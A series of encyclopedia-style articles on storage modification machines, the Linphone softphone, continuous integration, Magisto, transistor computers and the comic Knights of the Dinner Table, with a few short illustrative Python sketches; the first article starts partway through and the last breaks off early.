(3) if v = w then instruction z: Conditional instruction that compares two paths represented by words w and v to see if they end at the same node; if so, jump to instruction z, else continue. This instruction serves the same purpose as its counterpart in a register machine or Wang b-machine, corresponding to a Turing machine's ability to jump to a new state.
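To make the three instructions concrete, the following is a minimal Python sketch of an SMM storage structure; the class and method names (SMM, resolve, new, set_to, same) are invented for illustration and are not part of Schönhage's formalism. Nodes are modelled as dictionaries mapping each alphabet symbol to a target node, and the example at the end reproduces the new/set examples above:

class SMM:
    """Toy model of a storage modification machine's graph memory."""
    def __init__(self, alphabet=("0", "1")):
        self.alphabet = alphabet
        # The start ("active") node; initially every edge loops back to it.
        self.start = {}
        for s in alphabet:
            self.start[s] = self.start

    def resolve(self, word):
        # Follow the path labelled by the symbols of `word` from the start node.
        node = self.start
        for symbol in word:
            node = node[symbol]
        return node

    def new(self, word):
        # `new w`: follow all but the last symbol, then flip that last edge
        # to a fresh node whose own edges point back to the old last node.
        prefix, last = word[:-1], word[-1]
        parent = self.resolve(prefix)
        fresh = {s: parent for s in self.alphabet}
        parent[last] = fresh
        return fresh

    def set_to(self, w, v):
        # `set w to v`: redirect the last edge of path w to the node of path v.
        prefix, last = w[:-1], w[-1]
        self.resolve(prefix)[last] = self.resolve(v)

    def same(self, v, w):
        # `if v = w`: do the two paths end at the same node?
        return self.resolve(v) is self.resolve(w)

m = SMM()
m.new("101101")                   # new 10110[1] from the example above
m.set_to("1011011", "1011")       # set 1011011 to 1011
print(m.same("1011011", "1011"))  # True: both paths now reach the same node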
Knuth's "linking automaton" model
According to Schönhage, Knuth noted that the SMM model coincides with a special type of "linking automata" briefly explained in volume one of The Art of Computer Programming (cf. [4, pp. 462–463]).
Kolmogorov–Uspenskii machine (KU-machine) model
KUM differs from SMM in allowing only invertible pointers: for every pointer from a node x to a node y, an inverse pointer from y to x must be present. Since outgoing pointers must be labeled by distinct symbols of the alphabet, both KUM and SMM graphs have O(1) outdegree. However, KUM pointers' invertibility restricts the in-degree to O(1) as well. This addresses some concerns for physical (as opposed to purely informational) realism, like those in the above van Emde Boas quote.
An additional difference is that the KUM was intended as a generalization of the Turing machine, and so it allows the currently "active" node to be moved around the graph. Accordingly, nodes can be specified by individual characters instead of words, and the action to be taken can be determined by a state table instead of a fixed list of instructions.
See also
Register machine—generic register-based abstract machine computational model
Counter machine—most primitive machine, base models' instruction-sets are used throughout the class of register machines
Random-access machine—RAM: counter machine with added indirect addressing capability
Random-access stored-program machine—RASP: counter-based or RAM-based machine with a "program of instructions" held in the registers themselves, in the manner of a Universal Turing machine, i.e. the von Neumann architecture.
Turing machine—generic tape-based abstract machine computational model
Post–Turing machine—minimalist one-tape, two-direction, 1 symbol { blank, mark } Turing-like machine but with default sequential instruction execution in a manner similar to the basic 3-instruction counter machines.
References
Most references and a bibliography are to be found at the article Register machine. The following are particular to this article:
Amir Ben-Amram (1995), What is a "Pointer machine"?, SIGACTN: SIGACT News (ACM Special Interest Group on Automata and Computability Theory), volume 26, 1995. Also: DIKU, Department of Computer Science, University of Copenhagen, [email protected]. Wherein Ben-Amram describes the types and subtypes: (type 1a) Abstract Machines: Atomistic models including Kolmogorov-Uspenskii Machines (KUM), Schönhage's Storage Modification Machines (SMM), Knuth's "Linking Automaton", APLM and AFLM (Atomistic Pure-LISP Machine and Atomistic Full-LISP machine), General atomistic Pointer Machines, Jones' I Language; (type 1b) Abstract Machines: High-level models; (type 2) Pointer algorithms.
Andrey Kolmogorov and V. Uspenskii, On the definition of an algorithm, Uspekhi Mat. Nauk 13 (1958), 3-28. English translation in American Mathematical Society Translations, Series II, Volume 29 (1963), pp. 217–245.
Yuri Gurevich (2000), Sequential Abstract State Machines Capture Sequential Algorithms, ACM Transactions on Computational Logic, vol. 1, no. 1, (July 2000), pages 77–111. In a single sentence Gurevich compares the Schönhage [1980] "storage modification machines" to Knuth's "pointer machines." For more, similar models such as "random access machines" Gurevich references:
John E. Savage (1998), Models of Computation: Exploring the Power of Computing. Addison Wesley Longman.
Yuri Gurevich (1988), On Kolmogorov Machines and Related Issues, the column on "Logic in Computer Science", Bulletin of European Association for Theoretical Computer Science, Number 35, June 1988, 71-82. Introduced the unified description of Schönhage and Kolmogorov-Uspenskii machines used here.
Arnold Schönhage (1980), Storage Modification Machines, Society for Industrial and Applied Mathematics, SIAM J. Comput. Vol. 9, No. 3, August 1980. Wherein Schönhage shows the equivalence of his SMM with the "successor RAM" (Random Access Machine), etc. He refers to an earlier paper where he introduces the SMM:
Arnold Schönhage (1970), Universelle Turing Speicherung, Automatentheorie und Formale Sprachen, Dörr, Hotz, eds. Bibliogr. Institut, Mannheim, 1970, pp. 69–383.
Peter van Emde Boas, Machine Models and Simulations pp. 3–66, appearing in:
Jan van Leeuwen, ed. "Handbook of Theoretical Computer Science. Volume A: Algorithms and Complexity'', The MIT PRESS/Elsevier, 1990. (volume A). QA 76.H279 1990.
van Emde Boas' treatment of SMMs appears on pp. 32–35. This treatment clarifies Schönhage 1980; it closely follows, but slightly expands, the Schönhage treatment. Both references may be needed for effective understanding.
Register machines
|
11784110
|
https://en.wikipedia.org/wiki/Linphone
|
Linphone
|
Linphone (a contraction of "Linux phone") is a free voice over IP softphone, SIP client and service. It may be used for direct audio and video calls and for calls through any VoIP softswitch or IP-PBX. Linphone also provides the ability to exchange instant messages. It has a simple multilanguage interface based on Qt for the GUI and can also be run as a console-mode application on Linux.
The softphone is currently developed by Belledonne Communications in France. Linphone was initially developed for Linux but now supports many additional platforms including Microsoft Windows, macOS, and mobile phones running Windows Phone, iOS or Android. It supports ZRTP for end-to-end encrypted voice and video communication.
Linphone is licensed under the GNU GPL-3.0-or-later and supports IPv6. It can also be used behind a network address translator (NAT), meaning it can run behind home routers. It can interoperate with ordinary telephony via an Internet telephony service provider (ITSP).
Features
Linphone hosts a free SIP service on its website.
The Linphone client provides access to the following functionality:
Multi-account support
Registration with any SIP service and line status management
Contact list with status of other users
Conference call initiation
Combined message history and call details
Sending DTMF signals (SIP INFO / RFC 2833)
File sharing
Additional plugins
Open standards support
Protocols
SIP according to RFC 3261 (UDP, TCP and TLS)
SIP SIMPLE
NAT traversal by TURN and ICE
RTP/RTCP
Media-security: SRTP and ZRTP
Audio codecs
Audio codec support: Speex (narrow band and wideband), G.711 (μ-law, A-law), GSM, Opus, and iLBC (through an optional plugin)
Video codecs
Video codec support: MPEG-4, Theora, VP8 and H.264 (with a plugin based on x264), with resolutions from QCIF (176×144) to SVGA (800×600) provided that network bandwidth and CPU power are sufficient.
Gallery
See also
Comparison of VoIP software
List of SIP software
Opportunistic encryption
References
External links
Cross-platform software
Android (operating system) software
Free and open-source Android software
Communication software
Free VoIP software
Instant messaging clients
Instant messaging clients for Linux
IOS software
MacOS instant messaging clients
Videotelephony
VoIP software
Windows instant messaging clients
BlackBerry software
|
1774081
|
https://en.wikipedia.org/wiki/Continuous%20integration
|
Continuous integration
|
In software engineering, continuous integration (CI) is the practice of merging all developers' working copies to a shared mainline several times a day. Grady Booch first proposed the term CI in his 1991 method, although he did not advocate integrating several times a day. Extreme programming (XP) adopted the concept of CI and did advocate integrating more than once per day – perhaps as many as tens of times per day.
Rationale
When embarking on a change, a developer takes a copy of the current code base on which to work. As other developers submit changed code to the source code repository, this copy gradually ceases to reflect the repository code. Not only can the existing code base change, but new code can be added, as well as new libraries and other resources that create dependencies and potential conflicts.
The longer development continues on a branch without merging back to the mainline, the greater the risk of multiple integration conflicts and failures when the developer branch is eventually merged back. When developers submit code to the repository they must first update their code to reflect the changes in the repository since they took their copy. The more changes the repository contains, the more work developers must do before submitting their own changes.
Eventually, the repository may become so different from the developers' baselines that they enter what is sometimes referred to as "merge hell", or "integration hell", where the time it takes to integrate exceeds the time it took to make their original changes.
Workflows
Run tests locally
CI is intended to be used in combination with automated unit tests written through the practices of test-driven development. This is done by running and passing all unit tests in the developer's local environment before committing to the mainline. This helps avoid one developer's work-in-progress breaking another developer's copy. Where necessary, partially complete features can be disabled before committing, using feature toggles for instance.
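As a minimal illustration of the feature-toggle idea just mentioned, the following Python sketch shows unfinished work sitting on the mainline but staying disabled until a flag is switched on; the flag name, environment variable and checkout functions are invented for the example and are not taken from any particular framework:

import os

# Toggles read from the environment, so a half-finished feature can be merged
# to the mainline but remain switched off in every normal build.
FEATURE_FLAGS = {
    "new_checkout_flow": os.environ.get("ENABLE_NEW_CHECKOUT", "0") == "1",
}

def legacy_checkout(cart):
    return sum(cart)                  # the code path users currently hit

def new_checkout(cart):
    return round(sum(cart), 2)        # work in progress, off by default

def checkout(cart):
    if FEATURE_FLAGS["new_checkout_flow"]:
        return new_checkout(cart)
    return legacy_checkout(cart)

print(checkout([10.0, 4.5]))          # uses the legacy path unless ENABLE_NEW_CHECKOUT=1 is set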
Compile code in CI
A build server compiles the code periodically or even after every commit and reports the results to the developers. The use of build servers was introduced outside the XP (extreme programming) community, and many organisations have adopted CI without adopting all of XP.
Run tests in CI
In addition to automated unit tests, organisations using CI typically use a build server to implement continuous processes of applying quality control in general – small pieces of effort, applied frequently. In addition to running the unit and integration tests, such processes run additional static analyses, measure and profile performance, extract and format documentation from the source code and facilitate manual QA processes. On the popular Travis CI service for open-source, only 58.64% of CI jobs execute tests.
This continuous application of quality control aims to improve the quality of software, and to reduce the time taken to deliver it, by replacing the traditional practice of applying quality control after completing all development. This is very similar to the original idea of integrating more frequently to make integration easier, only applied to QA processes.
Deploy an artifact from CI
Now, CI is often intertwined with continuous delivery or continuous deployment in what is called CI/CD pipeline. "Continuous delivery" makes sure the software checked in on the mainline is always in a state that can be deployed to users and "continuous deployment" makes the deployment process fully automated.
History
The earliest known work on continuous integration was the Infuse environment developed by G. E. Kaiser, D. E. Perry, and W. M. Schell.
In 1994, Grady Booch used the phrase continuous integration in Object-Oriented Analysis and Design with Applications (2nd edition) to explain how, when developing using micro processes, "internal releases represent a sort of continuous integration of the system, and exist to force closure of the micro process".
In 1997, Kent Beck and Ron Jeffries invented Extreme Programming (XP) while on the Chrysler Comprehensive Compensation System project, including continuous integration. Beck published about continuous integration in 1998, emphasising the importance of face-to-face communication over technological support. In 1999, Beck elaborated more in his first full book on Extreme Programming. CruiseControl, one of the first open-source CI tools, was released in 2001.
In 2010, Timothy Fitz published an article detailing how IMVU's engineering team had built and been using the first practical CI system. While his post was originally met with skepticism, it quickly caught on and found widespread adoption as part of the Lean software development methodology, also based on IMVU.
Common practices
This section lists best practices suggested by various authors on how to achieve continuous integration, and how to automate this practice. Build automation is a best practice itself.
Continuous integration—the practice of frequently integrating one's new or changed code with the existing code repository—should occur frequently enough that no intervening window remains between commit and build, and such that no errors can arise without developers noticing them and correcting them immediately. Normal practice is to trigger these builds by every commit to a repository, rather than a periodically scheduled build. The practicalities of doing this in a multi-developer environment of rapid commits are such that it is usual to start a short timer after each commit, then to start a build when either this timer expires or a rather longer interval has passed since the last build. Note that since each new commit resets the timer used for the short-time trigger, this is the same technique used in many button debouncing algorithms. In this way, the commit events are "debounced" to prevent unnecessary builds between a series of rapid-fire commits. Many automated tools offer this scheduling automatically.
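The debouncing behaviour described above can be sketched as follows; this is an illustrative Python model rather than the scheduler of any particular CI product, and the interval values and function name are arbitrary choices for the example:

QUIET_PERIOD = 5.0   # seconds with no new commits before a build starts
MAX_WAIT = 60.0      # upper bound on how long a build may be postponed

def schedule_builds(commit_times):
    """Given sorted commit timestamps (in seconds), return the times at which
    builds would start under the debouncing rule described above."""
    builds = []
    pending_since = None   # first commit not yet covered by a build
    deadline = None        # when the next build is currently due
    for t in commit_times:
        if pending_since is not None and t >= deadline:
            builds.append(deadline)        # quiet period (or cap) expired
            pending_since = None
        if pending_since is None:
            pending_since = t
        # Each new commit resets the quiet-period timer, bounded by MAX_WAIT.
        deadline = min(t + QUIET_PERIOD, pending_since + MAX_WAIT)
    if pending_since is not None:
        builds.append(deadline)            # flush the final pending build
    return builds

# A burst of rapid commits yields one build; a later lone commit yields another.
print(schedule_builds([0, 1, 2, 3, 100]))  # [8.0, 105.0]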
Another factor is the need for a version control system that supports atomic commits; i.e., all of a developer's changes may be seen as a single commit operation. There is no point in trying to build from only half of the changed files.
To achieve these objectives, continuous integration relies on the following principles.
Maintain a code repository
This practice advocates the use of a revision control system for the project's source code. All artifacts required to build the project should be placed in the repository. In this practice and in the revision control community, the convention is that the system should be buildable from a fresh checkout and not require additional dependencies. Extreme Programming advocate Martin Fowler also mentions that where branching is supported by tools, its use should be minimised. Instead, it is preferred for changes to be integrated rather than for multiple versions of the software to be maintained simultaneously. The mainline (or trunk) should be the place for the working version of the software.
Automate the build
A single command should have the capability of building the system. Many build tools, such as make, have existed for many years. Other more recent tools are frequently used in continuous integration environments. Automation of the build should include automating the integration, which often includes deployment into a production-like environment. In many cases, the build script not only compiles binaries, but also generates documentation, website pages, statistics and distribution media (such as Debian DEB, Red Hat RPM or Windows MSI files).
Make the build self-testing
Once the code is built, all tests should run to confirm that it behaves as the developers expect it to behave.
Everyone commits to the baseline every day
By committing regularly, every committer can reduce the number of conflicting changes. Checking in a week's worth of work runs the risk of conflicting with other features and can be very difficult to resolve. Early, small conflicts in an area of the system cause team members to communicate about the change they are making. Committing all changes at least once a day (once per feature built) is generally considered part of the definition of Continuous Integration. In addition, performing a nightly build is generally recommended. These are lower bounds; the typical frequency is expected to be much higher.
Every commit (to baseline) should be built
The system should build commits to the current working version to verify that they integrate correctly. A common practice is to use Automated Continuous Integration, although this may be done manually. Automated Continuous Integration employs a continuous integration server or daemon to monitor the revision control system for changes, then automatically run the build process.
Every bug-fix commit should come with a test case
When fixing a bug, it is good practice to push a test case that reproduces the bug. This prevents the fix from being reverted and the bug from reappearing, which is known as a regression. Researchers have proposed automating this task: if a bug-fix commit does not contain a test case, one can be generated from the already existing tests.
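As a small illustration of this practice, a bug-fix commit can bundle the fix together with a unit test that reproduces the original failure, so the build breaks if the bug ever returns; the parse_price function and its bug below are hypothetical, invented purely for the example:

import unittest

def parse_price(text):
    # Fix: strip a leading currency symbol before converting; the old code
    # called float(text) directly and raised ValueError on input like "$19.99".
    return float(text.strip().lstrip("$"))

class TestParsePriceRegression(unittest.TestCase):
    def test_price_with_currency_symbol(self):
        # This input crashed before the fix; the test pins the behaviour.
        self.assertEqual(parse_price("$19.99"), 19.99)

    def test_plain_number_still_works(self):
        self.assertEqual(parse_price("7.50"), 7.5)

if __name__ == "__main__":
    unittest.main()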
Keep the build fast
The build needs to complete rapidly, so that if there is a problem with integration, it is quickly identified.
Test in a clone of the production environment
Having a test environment can lead to failures in tested systems when they deploy in the production environment because the production environment may differ from the test environment in a significant way. However, building a replica of a production environment is cost prohibitive. Instead, the test environment, or a separate pre-production environment ("staging") should be built to be a scalable version of the production environment to alleviate costs while maintaining technology stack composition and nuances. Within these test environments, service virtualisation is commonly used to obtain on-demand access to dependencies (e.g., APIs, third-party applications, services, mainframes, etc.) that are beyond the team's control, still evolving, or too complex to configure in a virtual test lab.
Make it easy to get the latest deliverables
Making builds readily available to stakeholders and testers can reduce the amount of rework necessary when rebuilding a feature that doesn't meet requirements. Additionally, early testing reduces the chances that defects survive until deployment. Finding errors earlier can reduce the amount of work necessary to resolve them.
All programmers should start the day by updating the project from the repository. That way, they will all stay up to date.
Everyone can see the results of the latest build
It should be easy to find out whether the build breaks and, if so, who made the relevant change and what that change was.
Automate deployment
Most CI systems allow the running of scripts after a build finishes. In most situations, it is possible to write a script to deploy the application to a live test server that everyone can look at. A further advance in this way of thinking is continuous deployment, which calls for the software to be deployed directly into production, often with additional automation to prevent defects or regressions.
Costs and benefits
Continuous integration is intended to produce benefits such as:
Integration bugs are detected early and are easy to track down due to small change sets. This saves both time and money over the lifespan of a project.
Avoids last-minute chaos at release dates, when everyone tries to check in their slightly incompatible versions
When unit tests fail or a bug emerges, if developers need to revert the codebase to a bug-free state without debugging, only a small number of changes are lost (because integration happens frequently)
Constant availability of a "current" build for testing, demo, or release purposes
Frequent code check-in pushes developers to create modular, less complex code
With continuous automated testing, benefits can include:
Enforces discipline of frequent automated testing
Immediate feedback on system-wide impact of local changes
Software metrics generated from automated testing and CI (such as metrics for code coverage, code complexity, and feature completeness) focus developers on developing functional, quality code, and help develop momentum in a team
Some downsides of continuous integration can include:
Constructing an automated test suite requires a considerable amount of work, including ongoing effort to cover new features and follow intentional code modifications.
Testing is considered a best practice for software development in its own right, regardless of whether or not continuous integration is employed, and automation is an integral part of project methodologies like test-driven development.
Continuous integration can be performed without any test suite, but the cost of quality assurance to produce a releasable product can be high if it must be done manually and frequently.
There is some work involved to set up a build system, and it can become complex, making it difficult to modify flexibly.
However, there are a number of continuous integration software projects, both proprietary and open-source, which can be used.
Continuous integration is not necessarily valuable if the scope of the project is small or contains untestable legacy code.
Value added depends on the quality of tests and how testable the code really is.
Larger teams mean that new code is constantly added to the integration queue, so tracking deliveries (while preserving quality) is difficult, and builds queueing up can slow down everyone.
With multiple commits and merges a day, partial code for a feature could easily be pushed and therefore integration tests will fail until the feature is complete.
Safety and mission-critical development assurance (e.g., DO-178C, ISO 26262) require rigorous documentation and in-process review that are difficult to achieve using continuous integration. This type of life cycle often requires additional steps be completed prior to product release when regulatory approval of the product is required.
See also
Application release automation
Build light indicator
Comparison of continuous integration software
Continuous design
Continuous testing
Multi-stage continuous integration
Rapid application development
References
External links
Agile software development
Extreme programming
Software development process
|
34045247
|
https://en.wikipedia.org/wiki/Magisto
|
Magisto
|
Magisto is a technology company founded in 2009 with a focus on providing artificial intelligence (AI) technology to make video editing fast and simple. It produces an online video editor of the same name (both as a web application and a mobile app) for automated video editing and production, aimed at consumers and businesses. The company was acquired by Vimeo in 2019 for an estimated .
Technology
Magisto was founded by Dr. Oren Boiman, a computer scientist who graduated from Tel Aviv University and went on to graduate work in computer vision at the Weizmann Institute of Science. Through his work, Boiman developed a number of patent-pending image analysis technologies that analyze unedited video and identify the most interesting parts, which became the basis of the Magisto apps. The system recognizes faces, animals, landscapes, action sequences, movements and other interesting content within the video, as well as analyzing speech and audio. These scenes are then edited together, along with music and effects, into share-worthy clips.
Automatic video editing
Automatic video editing products have emerged over the past decade to make video editing accessible to a broader consumer market. Automatic video editing technology does the work for the user, eliminating the need for a deeper understanding or knowledge of how to use complicated video editing software. Muvee Technologies introduced autoProducer, the first PC-based automatic video editing platform, in 2001. Other solutions, including Sony's MovieShaker and Roxio Cinematic, followed in 2002. As smartphones and consumer video recording devices became more prevalent, the need for an easier video solution led to renewed interest in automatic video editing.
Some similar applications are Videolicious, WeVideo, InVideo, Animoto, Powtoon, and Clipchamp.
Music
The Magisto app contains a library of music for users to utilize in their video creations. The music, largely by independent artists, is sorted by mood and is licensed for in-app use.
History
Magisto was founded in 2009 as SightEra (LTD) by Dr. Oren Boiman (CEO) and Dr. Alex Rav-Acha (CTO). Boiman was frustrated with the amount of time it took editing together videos of his daughter and wanted to design an easy to use application to capture and share videos without the time-consuming process of video editing.
Magisto was launched publicly on September 20, 2011, as a video editing software web application through which users could upload unedited video footage, choose a title and soundtrack and have their video edited for them automatically. On the following day Magisto was added to YouTube Create's collection of video production applications.
The Magisto iPhone app was launched publicly at the 2012 International Consumer Electronics Show (CES) in Las Vegas. At CES, the company was also declared winner of the 2012 CES Mobile App Showdown. On August 28, 2012, Magisto launched the Android app on Google Play. On September 13, 2012, Magisto launched a Google Chrome App and announced Google Drive integration.
On March 7, 2013, Magisto claimed 5 million users. Google listed Magisto as an "Editors’ Choice" on its list of "Best Apps of 2013". In September 2013, the company claimed that 10 million users had downloaded the App.
In February 2014 Magisto claimed that it had 20 million users, with 2 million new users per month. The company also confirmed investment from the Russian internet company Mail.Ru Group. In September 2014 Magisto rolled out a new feature called ‘Instagram Ready’, which allows users to upload 15-second clips that are automatically formatted for Instagram. In the same month Magisto also launched a new feature for iOS and Android users, called ‘Surprise Me’, which creates video from still photographs on users’ smartphones. In October 2014, Magisto was placed 9th on the 2014 Deloitte Israel Technology Fast 50 list, as one of the fastest-growing technology companies, and was named as a finalist in the Red Herring Top 100 Europe award.
In January 2015, Magisto participated in a statistical analysis on the habits of smartphone users in conjunction with Gigaom. In July 2015, Magisto released an editing theme dedicated to musician Jerry Garcia, endorsed by his daughter Trixie.
In April 2019, the company was acquired by Vimeo, the IAC-owned platform for hosting, sharing and monetizing streamed video, for an estimated .
Funding rounds
In 2010, the company received more than $5.5 million in Series A round and B venture round funding from Magma Venture Partners and Horizons Ventures.
In September 2011, at the same time as the public launch of their web application, Magisto announced a $5.5 million Series B funding round led by Li Ka-shing’s Horizons Ventures. Li Ka-Shing is known for making early-stage investments in companies like Facebook, Spotify, SecondMarket and Siri.
In 2014, the company received $2 million in Venture Funding from Magma Venture Partners, Qualcomm Ventures, Horizons Ventures and the Mail.Ru Group.
Business model
Magisto has a freemium business model: Users can create basic video clips for free. In addition, advanced business, professional and personal service tiers are available via various subscription plans, unlocking additional capabilities (such as longer videos, HD, premium themes), sophisticated customization and control features that improve the quality and precision of their AI powered editing.
Awards
Magisto won first place at Technonomy3, an annual Internet Technology start-up competition in Israel. Judges of the competition included Jeff Pulver, TechCrunch editor Mike Butcher, investor Yaron Samid, Bessemer Venture Partners Israel partner Adam Fisher and Brad McCarty of The Next Web.
Magisto won first place at CES 2012 Mobile app competition, during the launch of Magisto iOS mobile app.
Magisto was twice awarded Google Play Editors' Choice, was part of the iPhone App Store Best App awards for 2013 and 2014, and was included in Wired's Essential iPad Apps.
Magisto was named by Deloitte as the 7th fastest-growing company in EMEA in 2016.
See also
Video editing
Video server
Edit Decision List
Photo slideshow software
Video scratching
Video editing software
Comparison of video editing software
List of video editing software
Web application
Web Processing Service
High-definition video
References
External links
Vimeo
Film and video technology
Video processing
Software architecture
Magisto
Web development
Software companies of the United States
|
12289014
|
https://en.wikipedia.org/wiki/Transistor%20computer
|
Transistor computer
|
A transistor computer, now often called a second-generation computer, is a computer which uses discrete transistors instead of vacuum tubes. The first generation of electronic computers used vacuum tubes, which generated large amounts of heat and were bulky and unreliable. Second-generation computers, built through the late 1950s and 1960s, featured circuit boards filled with individual transistors and magnetic-core memory. These machines remained the mainstream design into the late 1960s, when integrated circuits started appearing and led to the third-generation computer.
History
The University of Manchester's experimental Transistor Computer was first operational in November 1953 and it is widely believed to be the first transistor computer to come into operation anywhere in the world. There were two versions of the Transistor Computer, the prototype, operational in 1953, and the full-size version, commissioned in April 1955. The 1953 machine had 92 point-contact transistors and 550 diodes, manufactured by STC. It had a 48-bit machine word. The 1955 machine had a total of 200 point-contact transistors and 1300 point diodes, which resulted in a power consumption of 150 watts. There were considerable reliability problems with the early batches of transistors and the average error-free run in 1955 was only 1.5 hours. The Computer also used a small number of tubes in its clock generator, so it was not the first fully transistorized machine.
The design of a full-size Transistor Computer was subsequently adopted by the Manchester firm of Metropolitan-Vickers, who changed all the circuits to use more reliable junction transistors. The production version was known as the Metrovick 950 and was built from 1956 to the extent of six or seven machines, which were "used commercially within the company" or "mainly for internal use".
Other early machines
During the mid-1950s a series of similar machines appeared. These included the Bell Laboratories TRADIC, completed in January 1954, which used a single high-power output vacuum-tube amplifier to supply its 1-MHz clock power.
The first fully transistorized computer was either the Harwell CADET, which first operated in February 1955 (though the price paid for this was that it operated only at the slow speed of 58 kHz), or the prototype IBM 604 transistor calculator. The Burroughs Corporation claimed that the SM-65 Atlas ICBM / THOR ABLE guidance computer (MOD 1) it delivered to the US Air Force at the Cape Canaveral missile range in June 1957 was "the world's first operational transistorized computer". MIT's Lincoln Laboratory started developing a transistorized computer, the TX-0, in 1956.
Further transistorized computers became operational in Japan (ETL Mark III, July 1956), in Canada (DRTE Computer, 1957), and in Austria (Mailüfterl, May 1958), these being the first transistorized computers in Asia, Canada and mainland Europe respectively.
First commercial fully transistorized calculator
In April 1955, IBM announced the IBM 608 transistor calculator, which was first shipped in December 1957. IBM and several historians thus consider the IBM 608 the first all solid-state computing machine commercially marketed. The development of the 608 was preceded by the prototyping of an experimental all-transistor version of the 604. This was built and demonstrated in October 1954, but was not commercialized.
Early commercial fully transistorized large-scale computers
The Philco Transac models S-1000 scientific computer and S-2000 electronic data processing computer were early commercially produced large-scale all-transistor computers; they were announced in 1957 but did not ship until sometime after the fall of 1958. The Philco computer name "Transac" stands for Transistor-Automatic-Computer. Both of these Philco computer models used the surface-barrier transistor in their circuitry designs, the world's first high-frequency transistor suitable for high-speed computers. The surface-barrier transistor was developed by Philco in 1953.
RCA shipped the RCA 501, its first all-transistor computer, in 1958.
In Italy, Olivetti's first commercial fully transistorized computer was the Olivetti Elea 9003, sold from 1959.
IBM
IBM, which dominated the data processing industry through most of the 20th century, introduced its first commercial transistorized computers beginning in 1958, with the IBM 7070, a ten-digit-word decimal machine. It was followed in 1959 by the IBM 7090, a 36-bit scientific machine, the highly popular IBM 1401 designed to replace punched card tabulating machines, and the desk-sized 1620, a variable length decimal machine. IBM's 7000 and 1400 series included many variants on these designs, with different data formats, instruction sets and even different character encodings, but all were built using the same series of electronics modules, the IBM Standard Modular System (SMS).
DEC
Developers of the TX-0 left to form the Digital Equipment Corporation in 1957. Transistorized from the beginning, early DEC products included the PDP-1, PDP-6, PDP-7 and early PDP-8s, the last starting the minicomputer revolution. Later models of the PDP-8, beginning with the PDP-8/I in 1968, used integrated circuits, making them third-generation computers.
System/360 and hybrid circuits
In 1964, IBM announced its System/360, a collection of computers covering a wide range of capabilities and prices with a unified architecture, to replace its earlier computers. Unwilling to bet the company on the immature monolithic IC technology of the early 1960s, IBM built the S/360 series using its Solid Logic Technology (SLT) modules. SLT could package several individual transistors and individual diodes with deposited resistors and interconnections in a module one-half inch square, roughly the logical equivalent of the earlier IBM Standard Modular System card. But unlike monolithic IC manufacturing, the diodes and transistors in an SLT module were individually placed and connected at the end of each module's assembly.
Schools and hobbyists
First-generation computers were largely out of reach of schools and hobbyists who wished to build their own, largely because of the cost of the large number of vacuum tubes required (though relay-based computer projects were undertaken). The fourth generation (VLSI) was also largely out of reach, because most of the design work was inside the integrated circuit package (though this barrier, too, was later removed). So second- and third-generation computer designs (transistors and SSI) were perhaps the best suited to being undertaken by schools and hobbyists.
See also
History of computing hardware
List of transistorized computers
References
|
260928
|
https://en.wikipedia.org/wiki/Knights%20of%20the%20Dinner%20Table
|
Knights of the Dinner Table
|
Knights of the Dinner Table (KoDT) is a comic book/strip created by Jolly R. Blackburn and published by Kenzer & Company. It primarily focuses on a group of role playing gamers and their actions at the gaming table, which often result in unfortunate, but humorous, consequences in the game. The name is a parody of King Arthur's Round Table, reinforced by the truism that roleplaying aficionados often end up sitting around their host's dinner table, as it is the only one large enough to accommodate the party (typically 4 to 8 people).
The comic
The panels are written by Blackburn, and given that he had no formal art training, the characters are drawn in simple caricatures which are scanned onto a computer and are continuously reused. Many of the stories presented in KoDT are based on actual in-game experiences of the developers or readers, who are encouraged to submit story ideas. Part of the comic's popularity stems from the reader's ability to relate to the characters and their experiences. KoDT has won the Origins Awards for Best Professional Game Magazine of 1998 and 1999. KoDT has also won the Origins Award for Best Game Accessory of 2009.
It also won the Origins Award Gamer's Choice: Best Periodical of 2003.
Publication history
In Shadis #2 (March/April 1990), then-editor Jolly Blackburn decided to draw a simple strip of his own to put on the last page, which he called Knights of the Dinner Table and which depicted the humorous interactions of a gaming group. When Blackburn published that first Knights strip, he thought that he was just filling a blank page, but when he tried to replace it with more professional strips beginning with Shadis #6, there was an outcry; because of that outcry, Knights soon returned. Blackburn also published Knights of the Dinner Table as a comic book, the first three issues of which appeared from his company Alderac Entertainment Games over the next year (1994-1995). As a result of diverging interests with his partners, Blackburn left Alderac in 1995, with Shadis #21 (December 1995) being his final issue; he kept the rights to Knights of the Dinner Table. Blackburn formed a new company called KODT Enteractive Facktory, which was to publish the Knights of the Dinner Table comic monthly. While he was working on getting that new company together, Blackburn received a call from the editor of TSR's Dragon magazine, asking if the Knights of the Dinner Table strip was now available; although Blackburn had originally planned to continue the strip in Shadis, he accepted the offer, and Knights of the Dinner Table thus began appearing in Dragon #226 (February 1996), a run that lasted through issue #269 (March 2000), when it was replaced by an expanded Nodwick strip.
While working on Knights of the Dinner Table #4 (1996), Blackburn concluded that he really did not want to go it alone, and David Kenzer and the staff of Kenzer & Company wanted Blackburn to join their company. In November 1996, David Kenzer and others visited Blackburn during a local con, and Blackburn decided that Kenzer had the sort of business sense and integrity he was looking for in a partner. Starting with issue #5 (February 1997), Knights of the Dinner Table was the work of the "KoDT Development Team", which consisted of Jolly Blackburn, David Kenzer, Brian Jelke and Steve Johansson.
Characters
The Knights of the Dinner Table
The main group of characters are the members of a gaming group known as "The Knights of the Dinner Table" in a fictionalized version of Muncie, Indiana. The players' best-known and most often-used characters are the HackMaster characters known as the "Untouchable Trio (Plus One)" (abbreviated as "UT+1"). They consist of:
Boris Alphonzo "B.A." Felton
B.A. is the GM and current organizer of the Knights (although the group was founded, and GMed, by Brian). In his 30s, he lives with his mother due to a failed attempt at game design, and works at the local pizza shop known as the Pizza-A-Go-Go, as well as his father's dry cleaning shop. B.A. has a bad reputation among the Knights for being ruthlessly cunning, largely because the players tend to be paranoid and to react poorly to setbacks, and any attempt at normal gameplay usually ends in misery (or complete and utter disaster). He often finds his games thwarted or sabotaged by the antics of the other players, much to his dismay.
